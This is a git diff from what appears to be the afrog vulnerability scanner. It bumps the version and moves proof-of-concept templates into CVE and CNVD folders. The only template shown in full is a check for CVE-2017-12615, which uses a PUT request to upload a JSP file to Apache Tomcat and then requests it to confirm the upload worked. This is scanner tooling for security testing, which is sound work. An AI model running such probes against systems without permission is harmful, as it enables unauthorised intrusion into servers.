diff --git a/pkg/config/banner.go b/pkg/config/banner.go index d1c3a5ba..5a8ffa59 100644 --- a/pkg/config/banner.go +++ b/pkg/config/banner.go @@ -9,7 +9,7 @@ import ( "github.com/zan8in/gologger" ) -const Version = "3.0.7" +const Version = "3.0.8" func InitBanner() { fmt.Printf("\r\n|\tA F 🐸 O G\t|") diff --git a/pocs/temp/afrog-pocs/cnvd/CNVD-2024-02175.yaml b/pocs/afrog-pocs/CNVD/2024/CNVD-2024-02175.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cnvd/CNVD-2024-02175.yaml rename to pocs/afrog-pocs/CNVD/2024/CNVD-2024-02175.yaml diff --git a/pocs/afrog-pocs/CVE/2017/CVE-2017-12615.yaml b/pocs/afrog-pocs/CVE/2017/CVE-2017-12615.yaml index 3360df5f..0fda2116 100644 --- a/pocs/afrog-pocs/CVE/2017/CVE-2017-12615.yaml +++ b/pocs/afrog-pocs/CVE/2017/CVE-2017-12615.yaml @@ -1,24 +1,25 @@ id: CVE-2017-12615 info: - name: Apache Tomcat RCE - author: j4ckzh0u(https://github.com/j4ckzh0u) - severity: high + name: Apache Tomcat 的远程代码执行漏洞 + author: zan8in + severity: critical + verified: true set: - filename: randomLowercase(6) - verifyStr: randomLowercase(12) - commentStr: randomLowercase(12) + filename: randomLowercase(6) + verifyStr: randomLowercase(12) + commentStr: randomLowercase(12) rules: - r0: - request: - method: PUT - path: /{{filename}}.jsp/ - body: '{{verifyStr}} <%-- {{commentStr}} --%>' - expression: response.status == 201 - r1: - request: - method: GET - path: /{{filename}}.jsp - expression: response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) + r0: + request: + method: PUT + path: /{{filename}}.jsp/ + body: "{{verifyStr}} <%-- {{commentStr}} --%>" + expression: response.status == 201 + r1: + request: + method: GET + path: /{{filename}}.jsp + expression: response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) expression: r0() && r1() diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-23692.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-23692.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cve/CVE-2024-23692.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-23692.yaml diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-36401.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-36401.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cve/CVE-2024-36401.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-36401.yaml diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-4956.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-4956.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cve/CVE-2024-4956.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-4956.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/fastadmin-lang-fileread.yaml b/pocs/afrog-pocs/vulnerability/fastadmin-lang-fileread.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/fastadmin-lang-fileread.yaml rename to pocs/afrog-pocs/vulnerability/fastadmin-lang-fileread.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/hikvision-applyautologinticket-rce.yaml b/pocs/afrog-pocs/vulnerability/hikvision-applyautologinticket-rce.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/hikvision-applyautologinticket-rce.yaml rename to pocs/afrog-pocs/vulnerability/hikvision-applyautologinticket-rce.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/nsq-admin-panel-unauth.yaml b/pocs/afrog-pocs/vulnerability/nsq-admin-panel-unauth.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/nsq-admin-panel-unauth.yaml rename to pocs/afrog-pocs/vulnerability/nsq-admin-panel-unauth.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/yonyou-u8-crm-fileread.yaml b/pocs/afrog-pocs/vulnerability/yonyou-u8-crm-fileread.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/yonyou-u8-crm-fileread.yaml rename to pocs/afrog-pocs/vulnerability/yonyou-u8-crm-fileread.yaml diff --git a/pocs/temp/afrog-pocs/cve/CVE-2017-12615.yaml b/pocs/temp/afrog-pocs/cve/CVE-2017-12615.yaml deleted file mode 100644 index 0fda2116..00000000 --- a/pocs/temp/afrog-pocs/cve/CVE-2017-12615.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2017-12615 - -info: - name: Apache Tomcat 的远程代码执行漏洞 - author: zan8in - severity: critical - verified: true - -set: - filename: randomLowercase(6) - verifyStr: randomLowercase(12) - commentStr: randomLowercase(12) -rules: - r0: - request: - method: PUT - path: /{{filename}}.jsp/ - body: "{{verifyStr}} <%-- {{commentStr}} --%>" - expression: response.status == 201 - r1: - request: - method: GET - path: /{{filename}}.jsp - expression: response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) -expression: r0() && r1() diff --git a/pocs/temp/afrog-pocs/version b/pocs/temp/afrog-pocs/version index cce977fd..d4b229f9 100644 --- a/pocs/temp/afrog-pocs/version +++ b/pocs/temp/afrog-pocs/version @@ -1 +1 @@ -0.3.61 \ No newline at end of file +0.3.62 \ No newline at end of file diff --git a/pocs/v/afrog-pocs.zip b/pocs/v/afrog-pocs.zip index 47dfff11..cba028ce 100644 Binary files a/pocs/v/afrog-pocs.zip and b/pocs/v/afrog-pocs.zip differ diff --git a/pocs/v/afrog.version b/pocs/v/afrog.version index 3a8b9717..e46454be 100644 --- a/pocs/v/afrog.version +++ b/pocs/v/afrog.version @@ -1 +1 @@ -3.0.7 \ No newline at end of file +3.0.8 \ No newline at end of file diff --git a/pocs/v/version b/pocs/v/version index cce977fd..d4b229f9 100644 --- a/pocs/v/version +++ b/pocs/v/version @@ -1 +1 @@ -0.3.61 \ No newline at end of file +0.3.62 \ No newline at end of file